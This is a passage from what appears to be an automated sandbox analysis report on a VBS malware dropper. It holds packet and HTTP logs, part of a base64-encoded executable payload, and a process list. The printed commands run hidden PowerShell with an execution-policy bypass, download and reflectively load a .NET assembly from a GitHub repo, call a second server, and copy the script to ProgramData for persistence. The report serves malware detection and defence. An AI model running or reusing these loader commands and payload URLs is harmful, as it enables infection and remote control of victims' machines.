                          Oct 2, 2024 05:26:51.548434019 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548446894 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548500061 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.548506975 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548881054 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548893929 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.548955917 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.548965931 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.549088001 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.549122095 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.549149036 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.549160957 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.549170971 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.549173117 CEST44349730185.199.111.133192.168.2.4
                          Oct 2, 2024 05:26:51.549223900 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.551948071 CEST49730443192.168.2.4185.199.111.133
                          Oct 2, 2024 05:26:51.849739075 CEST4973180192.168.2.472.5.43.53
                          Oct 2, 2024 05:26:51.854695082 CEST804973172.5.43.53192.168.2.4
                          Oct 2, 2024 05:26:51.854779005 CEST4973180192.168.2.472.5.43.53
                          Oct 2, 2024 05:26:51.854862928 CEST4973180192.168.2.472.5.43.53
                          Oct 2, 2024 05:26:51.859666109 CEST804973172.5.43.53192.168.2.4
                          Oct 2, 2024 05:27:13.210968018 CEST804973172.5.43.53192.168.2.4
                          Oct 2, 2024 05:27:13.211114883 CEST4973180192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:13.219258070 CEST4973180192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:13.219727993 CEST4973880192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:13.223968029 CEST804973172.5.43.53192.168.2.4
                          Oct 2, 2024 05:27:13.224503040 CEST804973872.5.43.53192.168.2.4
                          Oct 2, 2024 05:27:13.224579096 CEST4973880192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:13.224723101 CEST4973880192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:13.229475975 CEST804973872.5.43.53192.168.2.4
                          Oct 2, 2024 05:27:34.587415934 CEST804973872.5.43.53192.168.2.4
                          Oct 2, 2024 05:27:34.587485075 CEST4973880192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:34.587558031 CEST4973880192.168.2.472.5.43.53
                          Oct 2, 2024 05:27:34.592309952 CEST804973872.5.43.53192.168.2.4
                          Timestamp                            Source Port  Dest Port  Source IP    Dest IP
                          Oct 2, 2024 05:26:48.851131916 CEST  50290        53         192.168.2.4  1.1.1.1
                          Oct 2, 2024 05:26:48.857975006 CEST  53           50290      1.1.1.1      192.168.2.4
                          Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
                          Oct 2, 2024 05:26:48.851131916 CEST  192.168.2.4  1.1.1.1  0x20ac    Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)  false
                          Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                       CName  Address          Type            Class        DNS over HTTPS
                          Oct 2, 2024 05:26:48.857975006 CEST  1.1.1.1    192.168.2.4  0x20ac    No error (0)  raw.githubusercontent.com         185.199.111.133  A (IP address)  IN (0x0001)  false
                          Oct 2, 2024 05:26:48.857975006 CEST  1.1.1.1    192.168.2.4  0x20ac    No error (0)  raw.githubusercontent.com         185.199.108.133  A (IP address)  IN (0x0001)  false
                          Oct 2, 2024 05:26:48.857975006 CEST  1.1.1.1    192.168.2.4  0x20ac    No error (0)  raw.githubusercontent.com         185.199.109.133  A (IP address)  IN (0x0001)  false
                          Oct 2, 2024 05:26:48.857975006 CEST  1.1.1.1    192.168.2.4  0x20ac    No error (0)  raw.githubusercontent.com         185.199.110.133  A (IP address)  IN (0x0001)  false
                          • raw.githubusercontent.com
                          • 72.5.43.53
                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                          0           192.168.2.4  49731        72.5.43.53      80                7628  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Timestamp                            Bytes transferred  Direction  Data
                          Oct 2, 2024 05:26:51.854862928 CEST  73                 OUT        GET /450/RRCFG.txt HTTP/1.1
                          Host: 72.5.43.53
                          Connection: Keep-Alive


                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                          1           192.168.2.4  49738        72.5.43.53      80                7628  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Timestamp                            Bytes transferred  Direction  Data
                          Oct 2, 2024 05:27:13.224723101 CEST  73                 OUT        GET /450/RRCFG.txt HTTP/1.1
                          Host: 72.5.43.53
                          Connection: Keep-Alive


                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                          0           192.168.2.4  49730        185.199.111.133  443               7628  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Timestamp                Bytes transferred  Direction  Data
                          2024-10-02 03:26:49 UTC  128                OUT        GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1
                          Host: raw.githubusercontent.com
                          Connection: Keep-Alive
                          2024-10-02 03:26:49 UTC  905                IN         HTTP/1.1 200 OK
                          Connection: close
                          Content-Length: 2935468
                          Cache-Control: max-age=300
                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                          Content-Type: text/plain; charset=utf-8
                          ETag: "df9ff7aedbae4b4f50e2ae3a8f13fd0b84c66fbd35e7ac0df91a7a47b720c032"
                          Strict-Transport-Security: max-age=31536000
                          X-Content-Type-Options: nosniff
                          X-Frame-Options: deny
                          X-XSS-Protection: 1; mode=block
                          X-GitHub-Request-Id: 9D15:3A4BF6:1706DDC:18C7EAB:66FCBC5F
                          Accept-Ranges: bytes
                          Date: Wed, 02 Oct 2024 03:26:49 GMT
                          Via: 1.1 varnish
                          X-Served-By: cache-ewr-kewr1740032-EWR
                          X-Cache: HIT
                          X-Cache-Hits: 0
                          X-Timer: S1727839609.408920,VS0,VE1
                          Vary: Authorization,Accept-Encoding,Origin
                          Access-Control-Allow-Origin: *
                          Cross-Origin-Resource-Policy: cross-origin
                          X-Fastly-Request-ID: b84f01b968481bf29acaa8ad634c40305913df62
                          Expires: Wed, 02 Oct 2024 03:31:49 GMT
                          Source-Age: 282
                          2024-10-02 03:26:49 UTC1378INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 41 4f 50 39 57 59 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 4a 41 68 41 41 41 47 41 41 41 41 41 41 41 41 33 71 38 68 41 41 41 67 41 41 41 41 77 43 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                          Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAAOP9WYAAAAAAAAAAOAADiELATAAAJAhAAAGAAAAAAAA3q8hAAAgAAAAwCEAAABAAAAgAAAAAgA
                          2024-10-02 03:26:49 UTC1378INData Raw: 41 41 42 67 41 41 41 44 67 41 41 41 41 41 4b 67 49 44 66 51 55 41 41 41 51 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 41 51 41 41 51 35 30 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 6a 48 2f 2f 2f 2f 41 45 59 6f 45 67 41 41 42 67 49 6f 43 51 41 41 42 69 67 42 41 41 41 4b 4b 67 41 41 45 7a 41 44 41 47 30 41 41 41 41 42 41 41 41 52 49 41 45 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 49 41 41 41 41 46 41 41 41 41 47 51 41 41 41 44 67 41 41 41 41 41 41 69 67 55 41 41 41 47 41 32 38 46 41 41 41 47 4b 42 55 41 41 41 59 71 46 69 6f 43 4b 42 4d 41 41 41 59 44 4b 42 4d 41 41 41 59 6f 41 67 41 41 43 6a 6e 6f 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 75 45 41 41 45 4f 72 44 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 70 66 2f 2f 2f
                          Data Ascii: AABgAAADgAAAAAKgIDfQUAAAQgAAAAAH6EEAAEe0AQAAQ50v///yYgAAAAADjH////AEYoEgAABgIoCQAABigBAAAKKgAAEzADAG0AAAABAAARIAEAAAD+DgAAOAAAAAD+DAAARQIAAAAFAAAAGQAAADgAAAAAAigUAAAGA28FAAAGKBUAAAYqFioCKBMAAAYDKBMAAAYoAgAACjno////IAAAAAB+hBAABHsuEAAEOrD///8mIAAAAAA4pf///
                          2024-10-02 03:26:49 UTC1378INData Raw: 49 41 45 41 41 41 41 34 6d 66 2f 2f 2f 77 49 4f 42 48 30 4a 41 41 41 45 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 61 45 41 41 45 4f 58 33 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 63 76 2f 2f 2f 7a 49 43 4b 42 6b 41 41 41 59 6f 4a 77 41 41 42 69 6f 41 41 41 41 54 4d 41 4d 41 6b 51 41 41 41 41 4d 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 42 41 41 41 41 41 59 41 41 41 41 46 41 41 41 41 4c 41 41 41 41 46 49 41 41 41 41 34 41 51 41 41 41 43 6f 52 41 53 67 6b 41 41 41 47 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 2f 45 41 41 45 4f 73 72 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 76 2f 2f 2f 2f 78 45 42 4f 64 4c 2f 2f 2f 38 67 41 41 41 41 41 48 36 45 45 41 41 45 65 33 77 51 41 41 51 36 70 50 2f 2f 2f 79 59 67 41 41 41
                          Data Ascii: IAEAAAA4mf///wIOBH0JAAAEIAAAAAB+hBAABHtaEAAEOX3///8mIAAAAAA4cv///zICKBkAAAYoJwAABioAAAATMAMAkQAAAAMAABEgAwAAAP4OAAA4AAAAAP4MAABFBAAAAAYAAAAFAAAALAAAAFIAAAA4AQAAACoRASgkAAAGIAAAAAB+hBAABHs/EAAEOsr///8mIAEAAAA4v////xEBOdL///8gAAAAAH6EEAAEe3wQAAQ6pP///yYgAAA
                          2024-10-02 03:26:49 UTC1378INData Raw: 45 67 41 41 41 41 41 48 36 45 45 41 41 45 65 79 49 51 41 41 51 36 53 66 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 2b 2f 2f 2f 2f 45 51 51 6f 4f 51 41 41 42 6a 72 4d 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 74 6d 45 41 41 45 4f 68 37 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 45 2f 2f 2f 2f 39 33 45 2f 76 2f 2f 45 51 51 36 58 51 41 41 41 43 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 69 68 41 41 42 44 6b 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 55 41 52 51 4d 41 41 41 41 46 41 41 41 41 4b 51 41 41 41 44 6f 41 41 41 41 34 41 41 41 41 41 44 67 77 41 41 41 41 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 73 6f 45 41 41 45 4f 74 48 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 78 76 2f 2f 2f 78 45 45 4b 44 6f 41 41 41 59 67 41 67 41 41 41
                          Data Ascii: EgAAAAAH6EEAAEeyIQAAQ6Sf///yYgBAAAADg+////EQQoOQAABjrM////IAAAAAB+hBAABHtmEAAEOh7///8mIAAAAAA4E////93E/v//EQQ6XQAAACAAAAAAfoQQAAR7ihAABDkPAAAAJiAAAAAAOAQAAAD+DAUARQMAAAAFAAAAKQAAADoAAAA4AAAAADgwAAAAIAEAAAB+hBAABHsoEAAEOtH///8mIAEAAAA4xv///xEEKDoAAAYgAgAAA
                          2024-10-02 03:26:49 UTC1378INData Raw: 4f 4a 50 2f 2f 2f 38 43 46 48 30 51 41 41 41 45 49 41 55 41 41 41 41 34 67 76 2f 2f 2f 77 4a 37 45 41 41 41 42 43 67 45 41 41 41 72 49 41 45 41 41 41 42 2b 68 42 41 41 42 48 74 63 45 41 41 45 4f 6d 50 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 57 50 2f 2f 2f 79 6f 71 41 6e 73 50 41 41 41 45 4b 41 55 41 41 43 73 67 41 41 41 41 41 48 36 45 45 41 41 45 65 78 6b 51 41 41 51 35 4e 2f 2f 2f 2f 79 59 67 41 41 41 41 41 44 67 73 2f 2f 2f 2f 41 41 41 6d 66 68 45 41 41 41 51 55 2f 67 45 71 41 41 41 61 66 68 45 41 41 41 51 71 41 43 72 2b 43 51 41 41 62 77 30 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 77 63 41 41 41 6f 71 41 43 72 2b 43 51 41 41 62 31 30 41 41 41 59 71 41 44 34 41 2f 67 6b 41 41 50 34 4a 41 51 41 6f 62 77 41 41 42 69 6f 36 2f 67 6b 41 41 50 34 4a 41 51 42
                          Data Ascii: OJP///8CFH0QAAAEIAUAAAA4gv///wJ7EAAABCgEAAArIAEAAAB+hBAABHtcEAAEOmP///8mIAEAAAA4WP///yoqAnsPAAAEKAUAACsgAAAAAH6EEAAEexkQAAQ5N////yYgAAAAADgs////AAAmfhEAAAQU/gEqAAAafhEAAAQqACr+CQAAbw0AAAoqACr+CQAAbwcAAAoqACr+CQAAb10AAAYqAD4A/gkAAP4JAQAobwAABio6/gkAAP4JAQB
                          2024-10-02 03:26:49 UTC1378INData Raw: 67 41 41 41 5a 7a 45 41 41 41 43 6e 4d 52 41 41 41 4b 66 52 41 41 41 41 51 67 41 67 41 41 41 48 36 45 45 41 41 45 65 32 34 51 41 41 51 35 41 50 37 2f 2f 79 59 67 48 51 41 41 41 44 6a 31 2f 66 2f 2f 41 78 38 51 4b 4e 45 43 41 41 59 35 4a 41 49 41 41 43 41 4f 41 41 41 41 66 6f 51 51 41 41 52 37 4a 68 41 41 42 44 6e 55 2f 66 2f 2f 4a 69 41 44 41 41 41 41 4f 4d 6e 39 2f 2f 38 43 65 78 59 41 41 41 51 52 42 68 45 48 49 50 2f 2f 2f 33 39 66 63 31 67 41 41 41 5a 76 45 67 41 41 43 69 41 52 41 41 41 41 66 6f 51 51 41 41 52 37 55 78 41 41 42 44 71 62 2f 66 2f 2f 4a 69 41 61 41 41 41 41 4f 4a 44 39 2f 2f 38 43 63 78 4d 41 41 41 70 39 46 67 41 41 42 43 41 48 41 41 41 41 4f 48 76 39 2f 2f 38 52 42 79 41 41 41 41 43 41 58 7a 6c 4a 41 51 41 41 49 41 55 41 41 41 41 34 5a
                          Data Ascii: gAAAZzEAAACnMRAAAKfRAAAAQgAgAAAH6EEAAEe24QAAQ5AP7//yYgHQAAADj1/f//Ax8QKNECAAY5JAIAACAOAAAAfoQQAAR7JhAABDnU/f//JiADAAAAOMn9//8CexYAAAQRBhEHIP///39fc1gAAAZvEgAACiARAAAAfoQQAAR7UxAABDqb/f//JiAaAAAAOJD9//8CcxMAAAp9FgAABCAHAAAAOHv9//8RByAAAACAXzlJAQAAIAUAAAA4Z
                          2024-10-02 03:26:49 UTC1378INData Raw: 41 41 42 2b 68 42 41 41 42 48 73 78 45 41 41 45 4f 6b 6a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 50 66 2f 2f 2f 7a 6a 53 2f 2f 2f 2f 49 41 55 41 41 41 41 34 4c 76 2f 2f 2f 77 41 6f 55 67 41 41 42 68 45 42 4b 46 4d 41 41 41 59 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 5a 78 41 41 42 44 6f 50 41 41 41 41 4a 69 41 41 41 41 41 41 4f 41 51 41 41 41 44 2b 44 41 49 41 52 51 45 41 41 41 41 46 41 41 41 41 4f 41 41 41 41 41 44 64 5a 77 41 41 41 43 59 67 41 41 41 41 41 48 36 45 45 41 41 45 65 30 73 51 41 41 51 36 44 77 41 41 41 43 59 67 41 41 41 41 41 44 67 45 41 41 41 41 2f 67 77 41 41 45 55 43 41 41 41 41 42 51 41 41 41 43 63 41 41 41 41 34 41 41 41 41 41 42 51 54 42 53 41 41 41 41 41 41 66 6f 51 51 41 41 52 37 67 68 41 41 42 44 72 58 2f 2f 2f 2f 4a 69 41
                          Data Ascii: AAB+hBAABHsxEAAEOkj///8mIAAAAAA4Pf///zjS////IAUAAAA4Lv///wAoUgAABhEBKFMAAAYTBSAAAAAAfoQQAAR7ZxAABDoPAAAAJiAAAAAAOAQAAAD+DAIARQEAAAAFAAAAOAAAAADdZwAAACYgAAAAAH6EEAAEe0sQAAQ6DwAAACYgAAAAADgEAAAA/gwAAEUCAAAABQAAACcAAAA4AAAAABQTBSAAAAAAfoQQAAR7ghAABDrX////JiA
                          2024-10-02 03:26:49 UTC1378INData Raw: 59 67 43 41 41 41 41 44 67 4a 2f 76 2f 2f 45 51 45 6f 53 77 41 41 42 68 4d 48 49 41 73 41 41 41 41 34 39 76 33 2f 2f 78 45 4a 4b 68 45 41 65 78 67 41 41 41 51 6f 56 77 41 41 42 6e 4d 67 41 41 41 47 45 77 6b 67 42 67 41 41 41 44 6a 57 2f 66 2f 2f 4f 4e 37 2f 2f 2f 38 67 44 41 41 41 41 48 36 45 45 41 41 45 65 7a 38 51 41 41 51 36 76 66 33 2f 2f 79 59 67 44 67 41 41 41 44 69 79 2f 66 2f 2f 41 6e 73 54 41 41 41 45 45 51 51 52 42 53 68 57 41 41 41 47 45 77 67 67 42 77 41 41 41 44 69 58 2f 66 2f 2f 41 42 4d 77 41 77 42 39 41 41 41 41 41 51 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 57 51 41 41 41 41 55 41 41 41 41 76 41 41 41 41 4f 46 51 41 41 41 41 43 63 77 34 41 41 41 70 39 45 41 41 41 42 43 41 41 41
                          Data Ascii: YgCAAAADgJ/v//EQEoSwAABhMHIAsAAAA49v3//xEJKhEAexgAAAQoVwAABnMgAAAGEwkgBgAAADjW/f//ON7///8gDAAAAH6EEAAEez8QAAQ6vf3//yYgDgAAADiy/f//AnsTAAAEEQQRBShWAAAGEwggBwAAADiX/f//ABMwAwB9AAAAAQAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAAWQAAAAUAAAAvAAAAOFQAAAACcw4AAAp9EAAABCAAA
                          2024-10-02 03:26:49 UTC1378INData Raw: 42 68 62 2b 42 43 6f 41 41 41 41 2b 44 77 41 44 4b 48 45 41 41 41 59 57 2f 67 49 57 2f 67 45 71 4d 67 38 41 41 79 68 78 41 41 41 47 46 76 34 43 4b 67 41 41 41 44 34 50 41 41 4d 6f 63 51 41 41 42 68 62 2b 42 42 62 2b 41 53 6f 6d 44 77 41 44 4b 48 49 41 41 41 59 71 41 41 41 79 44 77 41 44 4b 48 49 41 41 41 59 57 2f 67 45 71 41 41 41 41 45 7a 41 44 41 41 6f 42 41 41 41 4b 41 41 41 52 49 41 51 41 41 41 44 2b 44 67 41 41 4f 41 41 41 41 41 44 2b 44 41 41 41 52 51 55 41 41 41 43 4b 41 41 41 41 73 51 41 41 41 41 55 41 41 41 42 67 41 41 41 41 4c 77 41 41 41 44 69 46 41 41 41 41 45 67 45 44 65 78 30 41 41 41 51 6f 48 51 41 41 43 69 6f 43 65 78 34 41 41 41 52 76 48 67 41 41 43 67 4e 37 48 67 41 41 42 43 68 34 41 41 41 47 62 78 38 41 41 41 6f 71 41 69 68 6a 41 41 41
                          Data Ascii: Bhb+BCoAAAA+DwADKHEAAAYW/gIW/gEqMg8AAyhxAAAGFv4CKgAAAD4PAAMocQAABhb+BBb+ASomDwADKHIAAAYqAAAyDwADKHIAAAYW/gEqAAAAEzADAAoBAAAKAAARIAQAAAD+DgAAOAAAAAD+DAAARQUAAACKAAAAsQAAAAUAAABgAAAALwAAADiFAAAAEgEDex0AAAQoHQAACioCex4AAARvHgAACgN7HgAABCh4AAAGbx8AAAoqAihjAAA
                          2024-10-02 03:26:49 UTC1378INData Raw: 2f 2f 2f 78 4d 77 41 77 43 42 41 41 41 41 43 77 41 41 45 53 41 43 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 4c 51 41 41 41 44 67 41 41 41 41 46 41 41 41 41 4f 43 67 41 41 41 41 43 41 79 68 37 41 41 41 47 45 77 45 67 41 51 41 41 41 48 36 45 45 41 41 45 65 35 59 51 41 41 51 36 7a 66 2f 2f 2f 79 59 67 41 51 41 41 41 44 6a 43 2f 2f 2f 2f 46 43 6f 52 41 51 51 6f 67 51 41 41 42 69 6f 52 41 54 72 77 2f 2f 2f 2f 49 41 41 41 41 41 42 2b 68 42 41 41 42 48 73 31 45 41 41 45 4f 5a 7a 2f 2f 2f 38 6d 49 41 41 41 41 41 41 34 6b 66 2f 2f 2f 77 41 41 41 42 4d 77 42 41 43 43 41 41 41 41 43 77 41 41 45 53 41 42 41 41 41 41 2f 67 34 41 41 44 67 41 41 41 41 41 2f 67 77 41 41 45 55 44 41 41 41 41 42 51 41 41 41 43 73 41 41 41 42 55 41
                          Data Ascii: ///xMwAwCBAAAACwAAESACAAAA/g4AADgAAAAA/gwAAEUDAAAALQAAADgAAAAFAAAAOCgAAAACAyh7AAAGEwEgAQAAAH6EEAAEe5YQAAQ6zf///yYgAQAAADjC////FCoRAQQogQAABioRATrw////IAAAAAB+hBAABHs1EAAEOZz///8mIAAAAAA4kf///wAAABMwBACCAAAACwAAESABAAAA/g4AADgAAAAA/gwAAEUDAAAABQAAACsAAABUA


                          Target ID:0
                          Start time:23:26:44
                          Start date:01/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs"
                          Imagebase:0x7ff64e850000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:1
                          Start time:23:26:45
                          Start date:01/10/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:2
                          Start time:23:26:45
                          Start date:01/10/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:23:26:47
                          Start date:01/10/2024
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
                          Imagebase:0x7ff788560000
                          File size:452'608 bytes
                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:23:26:51
                          Start date:01/10/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs"
                          Imagebase:0x7ff751550000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:23:26:51
                          Start date:01/10/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:7
                          Start time:23:27:03
                          Start date:01/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs"
                          Imagebase:0x7ff64e850000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:10
                          Start time:23:27:11
                          Start date:01/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs"
                          Imagebase:0x7ff64e850000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                            Memory Dump Source
                            • Source File: 00000001.00000002.2228830679.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ffd9ba00000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction ID: 9726ac44c96be3327404be87711fb45009209bbbc61ecf5bfc1889affbc12d5a
                            • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                            • Instruction Fuzzy Hash: 1001677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5D736E882CB45
                            Memory Dump Source
                            • Source File: 00000003.00000002.2209048419.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_7ffd9bae0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
